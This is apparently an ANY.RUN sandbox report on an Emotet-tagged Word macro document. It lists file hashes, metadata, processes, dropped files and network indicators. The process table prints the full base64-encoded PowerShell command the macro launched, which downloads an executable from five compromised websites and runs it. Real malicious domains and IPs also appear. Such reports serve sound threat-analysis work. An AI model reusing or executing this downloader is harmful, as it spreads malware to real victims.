analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Rep-09468685US-May-22-2019.doc

Full analysis: https://app.any.run/tasks/3e5c6207-b849-4f7e-b3b6-1fcb037982bb
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: May 24, 2019, 16:54:29
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Azerbaijan Ergonomic Metal Car, Subject: Cambridgeshire, Author: Mable Bradtke, Comments: Ameliorated Peru Direct, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed May 22 14:11:00 2019, Last Saved Time/Date: Wed May 22 14:11:00 2019, Number of Pages: 1, Number of Words: 10, Number of Characters: 58, Security: 0
MD5:

43ACB347E4EEBC12E33760294B87D2A5

SHA1:

2A064CF5ADB094E7CD8001FC9DDD882AB4A18851

SHA256:

59ED5135EB63464C4124E4D29C848E489D865FFBFFEB72CF481ED18A848D8D05

SSDEEP:

3072:177HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qQyVuosKQn+of:177HUUUUUUUUUUUUUUUUUUUT52VryVuT

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 3808)

    • Creates files in the user directory

      • powershell.exe (PID: 3808)

    • Executed via WMI

      • powershell.exe (PID: 3808)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3660)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3660)

    • Manual execution by user

      • mmc.exe (PID: 3524)
      • mmc.exe (PID: 3424)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: Azerbaijan Ergonomic Metal Car
Subject: Cambridgeshire
Author: Mable Bradtke
Keywords: -
Comments: Ameliorated Peru Direct
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:22 13:11:00
ModifyDate: 2019:05:22 13:11:00
Pages: 1
Words: 10
Characters: 58
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Towne and Sons
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 67
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Champlin
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
4
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe mmc.exe no specs mmc.exe

Process information

PID
CMD
Path
Indicators
Parent process
3660"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\Rep-09468685US-May-22-2019.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3808powershell -ExecutionPolicy bypass -noprofile -e JABsAFkATQBYAGIAawA4ADMAPQAnAEIATQBZADEAawBYACcAOwAkAFEAZgB2AEkAagBWAFUAagAgAD0AIAAnADgAMAA2ACcAOwAkAHEANwBYAEoATgBWAGMAPQAnAEMARABiAEgAYwA1AEwAJwA7ACQAZABZADcAcABDAHIAVwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUQBmAHYASQBqAFYAVQBqACsAJwAuAGUAeABlACcAOwAkAEEAZgBGAEcAegAwAGkAPQAnAEcANgBpAE0AaQBtACcAOwAkAFkAegA5AHEANABQAHUAPQAuACgAJwBuAGUAdwAtAG8AYgBqACcAKwAnAGUAJwArACcAYwB0ACcAKQAgAG4ARQBUAGAALgBXAGUAQgBgAEMAYABsAEkAZQBgAE4AdAA7ACQASgBvAEwAMwBtAHQANQBKAD0AJwBoAHQAdABwADoALwAvAGIAZQB0AHQAeQBhAHoAYQByAGkALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBhADIAbgA3ADgAMwAyAC8AQABoAHQAdABwADoALwAvAGYAaQB0AG4AZQBzAGMAbwBvAGsALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB3AGgAcQBjADMANQA5ADIAOAAvAEAAaAB0AHQAcAA6AC8ALwB0AGUAbgBnAGYAZQBpAHcAYQBuAGsAYQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AeQBxADMAZwAyADMALwBAAGgAdAB0AHAAOgAvAC8AYQBzAHAAZQBjAHQAaQB2AGUAcwBvAGwAdQB0AGkAbwBuAHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMgA1ADEAOAAvAEAAaAB0AHQAcAA6AC8ALwBtAGEAawBhAG4AYQBuAGsAaABhAHMAagBvAGcAeQBhAC4AMAAwADAAdwBlAGIAaABvAHMAdABhAHAAcAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8ANwA0AHYAegAwADMALwAnAC4AcwBQAGwASQB0ACgAJwBAACcAKQA7ACQAQQBXAFAAMABCADAAcAA9ACcAUQB3ADcAdgBpAHAAaQBBACcAOwBmAG8AcgBlAGEAYwBoACgAJABpAGkAbQBaAHYAbgByADIAIABpAG4AIAAkAEoAbwBMADMAbQB0ADUASgApAHsAdAByAHkAewAkAFkAegA5AHEANABQAHUALgBEAG8AVwBOAGwAbwBBAEQAZgBpAEwARQAoACQAaQBpAG0AWgB2AG4AcgAyACwAIAAkAGQAWQA3AHAAQwByAFcAKQA7ACQAVwB0AEcAWQBtAFUAPQAnAEEAdwAyAGoAegBIACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQAZABZADcAcABDAHIAVwApAC4AbABlAE4AZwB0AGgAIAAtAGcAZQAgADIAMAA2ADkAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAcwB0AEEAcgB0ACgAJABkAFkANwBwAEMAcgBXACkAOwAkAHAAWQBfAGoAYQBoAF8AcAA9ACcAUwBuAFEAQQBMAHYAWQBqACcAOwBiAHIAZQBhAGsAOwAkAHcAbgBwAHoAbwBwAHcAOQA9ACcAcAB0AGwAMQB2AG4AdwBzACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEYAdAAxAFcANABzAD0AJwBpAHcAYQBpAFYAMAAyAEoAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3424"C:\Windows\system32\mmc.exe" "C:\Windows\system32\compmgmt.msc" C:\Windows\system32\mmc.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Management Console
Exit code:
3221226540
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3524"C:\Windows\system32\mmc.exe" "C:\Windows\system32\compmgmt.msc" C:\Windows\system32\mmc.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft Management Console
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 639
Read events
1 157
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
9

Dropped files

PID
Process
Filename
Type
3660WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVREDE7.tmp.cvr
MD5:
SHA256:
3808powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2VYWVS0ZDJAT7EDW5H43.temp
MD5:
SHA256:
3808powershell.exeC:\Users\admin\806.exe
MD5:
SHA256:
3660WINWORD.EXEC:\Users\admin\Downloads\~$p-09468685US-May-22-2019.docpgc
MD5:530260CD5339D9710CBA5443B1816D42
SHA256:46723193D82E44BC4420CC4889195C4B0E657D1F9E558BFFC0A5D4E3651B6174
3808powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11fdb6.TMPbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
3808powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
3660WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C3824EDB.wmfwmf
MD5:7DA7724C9451AE668602108FB06903A7
SHA256:BC1215A106686AFD3E2AAD20AB81D3E8CF9F4F6B71802EEC27A01470C144B4DA
3660WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:3C0C63989717052C05DF9300070DE2D7
SHA256:12BDEEE6E522138360933BB809898BEDC51F81BAAA4329B8F50421C79A255FFC
3660WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D25E28A1.wmfwmf
MD5:42E4130F666B2DE96D0229A1957654C3
SHA256:62C18E0ED9873F5D2040EF3ED9091637E4E1FB8ECA36F028FF4E14C00BD9450E
3660WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2AB1362E.wmfwmf
MD5:997BEDE769FDA418EC89067256FD5A03
SHA256:CBA3BEA1AD0807C1434107997600A42628A6DD69021607920CEBADEF745324EB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
6
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3808
powershell.exe
GET
167.179.85.88:80
http://tengfeiwanka.com/wp-admin/yq3g23/
NZ
suspicious
3808
powershell.exe
GET
167.179.85.88:80
http://tengfeiwanka.com/wp-admin/yq3g23/
NZ
suspicious
3808
powershell.exe
GET
200
136.243.147.87:80
http://bettyazari.com/cgi-sys/suspendedpage.cgi
DE
html
7.41 Kb
suspicious
3808
powershell.exe
GET
404
165.22.78.206:80
http://fitnescook.com/wp-content/whqc35928/
US
html
178 b
unknown
3808
powershell.exe
GET
200
104.24.97.242:80
http://aspectivesolutions.com/wp-admin/02518/
US
html
3.97 Kb
malicious
3808
powershell.exe
GET
302
136.243.147.87:80
http://bettyazari.com/wp-content/a2n7832/
DE
html
593 b
suspicious
3808
powershell.exe
GET
403
145.14.145.179:80
http://makanankhasjogya.000webhostapp.com/wp-admin/74vz03/
US
html
8.25 Kb
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3808
powershell.exe
136.243.147.87:80
bettyazari.com
Hetzner Online GmbH
DE
suspicious
3808
powershell.exe
167.179.85.88:80
tengfeiwanka.com
NZ
suspicious
3808
powershell.exe
104.24.97.242:80
aspectivesolutions.com
Cloudflare Inc
US
shared
3808
powershell.exe
165.22.78.206:80
fitnescook.com
US
unknown
167.179.85.88:80
tengfeiwanka.com
NZ
suspicious
3808
powershell.exe
145.14.145.179:80
makanankhasjogya.000webhostapp.com
Hostinger International Limited
US
shared

DNS requests

Domain
IP
Reputation
bettyazari.com
  • 136.243.147.87
suspicious
fitnescook.com
  • 165.22.78.206
unknown
tengfeiwanka.com
  • 167.179.85.88
suspicious
aspectivesolutions.com
  • 104.24.97.242
  • 104.24.96.242
malicious
makanankhasjogya.000webhostapp.com
  • 145.14.145.179
shared

Threats

PID
Process
Class
Message
Not Suspicious Traffic
ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup)
Process
Message
mmc.exe
ViewerConfigPath = 'C:\ProgramData\Microsoft\Event Viewer': Microsoft.Windows.ManagementUI.CombinedControls.EventsNode
mmc.exe
ViewerViewsFolderPath = 'C:\ProgramData\Microsoft\Event Viewer\Views': Microsoft.Windows.ManagementUI.CombinedControls.EventsNode
mmc.exe
ViewerAdminViewsPath = 'C:\ProgramData\Microsoft\Event Viewer\Views\ApplicationViewsRootNode': Microsoft.Windows.ManagementUI.CombinedControls.EventsNode
mmc.exe
ViewerExternalLogsPath = 'C:\ProgramData\Microsoft\Event Viewer\ExternalLogs': Microsoft.Windows.ManagementUI.CombinedControls.EventsNode
mmc.exe
AddIcons: Microsoft.TaskScheduler.SnapIn.TaskSchedulerExtension
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Rep-09468685US-May-22-2019.doc